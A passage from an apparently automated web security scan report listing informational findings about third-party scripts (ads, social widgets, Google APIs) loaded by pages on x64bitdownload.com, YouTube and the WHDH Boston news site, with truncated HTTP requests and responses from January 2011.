<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1478. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1479. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1480. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1481. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1482. http://www.youtube.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=ffc014281d37870cbf0e0f6c727b6931cwsAAAAzVVOtwdbzTT2iZA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js"></script>
...[SNIP]...

21.1483. http://www.youtube.com/subscribe_widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/subscribe_widget

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-subscribe-widget-vflMJanIs.js

Request

Response

21.1484. http://www1.whdh.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
X-doRedirect: false;
X-Version: 1.0;
Expires: Mon, 24 Jan 2011 21:54:37 GMT
Cache-Control: private, max-age=300
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60124
Via: 1.1 dfw107007 (MII-APC/1.6)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston/Regional News, Weather, Traffic, Sports, Entertainment Coverage
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1485. http://www1.whdh.com/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/contact/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /contact/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:02 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 118
Cache-Control: max-age=16035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:22:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 10214
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Contact Us</title>
<meta name="publisher" content="New England N
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1486. http://www1.whdh.com/contact/closed-caption-concerns previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/contact/closed-caption-concerns

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /contact/closed-caption-concerns HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: closed-caption-concerns.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 9050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Closed Caption Concerns</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1487. http://www1.whdh.com/eupdate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/eupdate/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /eupdate/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Pragma: no-cache
Age: 0
Cache-Control: max-age=0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 8870

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>eUpdate</title>
<meta name="publisher" content="New England News Station Boston Chan
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1488. http://www1.whdh.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/events/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /events/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43028
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13847
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Community Calendar</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1489. http://www1.whdh.com/expedient previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/expedient

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /expedient HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:18 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: expedient.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:07 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close
Content-Length: 13391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Expedient Communication's Boston Data Center</title>
<meta name="publisher" content=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1490. http://www1.whdh.com/fcc/reports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/fcc/reports

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /fcc/reports HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:15 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: reports.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:58:05 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 7840

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>FCC Reports</title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1491. http://www1.whdh.com/features/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /features/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7054
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16880
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Features</title>
<meta name="publisher" content="New England News Station Boston Cha
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1492. http://www1.whdh.com/features/articles/dish/BO144734/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144734/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144734/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:31 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7056
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16927
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Italian Christmas Eve Feast of 7 fish</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1493. http://www1.whdh.com/features/articles/dish/BO144759/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144759/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144759/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3018
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15479
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Holiday Cocktails at il Casale</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1494. http://www1.whdh.com/features/articles/dish/BO144797/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144797/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144797/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=4120
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:05:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16093
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Amelia's pork tenderloin</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1495. http://www1.whdh.com/features/articles/dish/BO144833/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144833/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/dish/BO144833/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=456
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15228
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Taleggio Mac & Cheese</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1496. http://www1.whdh.com/features/articles/hank/BO144372/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144372/

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/7newsboston/embed.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144372/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
